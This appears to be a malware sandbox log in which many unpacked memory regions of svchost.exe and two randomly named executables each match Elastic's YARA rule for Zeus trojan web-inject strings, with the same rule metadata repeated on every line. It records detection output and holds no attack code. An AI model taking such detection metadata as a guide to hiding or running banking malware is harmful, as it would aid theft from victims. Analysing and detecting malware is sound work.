Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.50.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.48.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.36.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.NcYLgtXIKJgHj.exe.2652000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f8dc8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.NcYLgtXIKJgHj.exe.2eb0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f31c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.58.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.NcYLgtXIKJgHj.exe.2a60000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.64.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.55.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.44.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.49.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.69.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f81c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ee00000.74.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.24.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.NcYLgtXIKJgHj.exe.2340000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.68.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.NcYLgtXIKJgHj.exe.3100000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.NcYLgtXIKJgHj.exe.2a60000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.60.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.68.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.NcYLgtXIKJgHj.exe.2202000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.53.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.NcYLgtXIKJgHj.exe.2922000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.NcYLgtXIKJgHj.exe.2fa2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.66.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.NcYLgtXIKJgHj.exe.2740000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
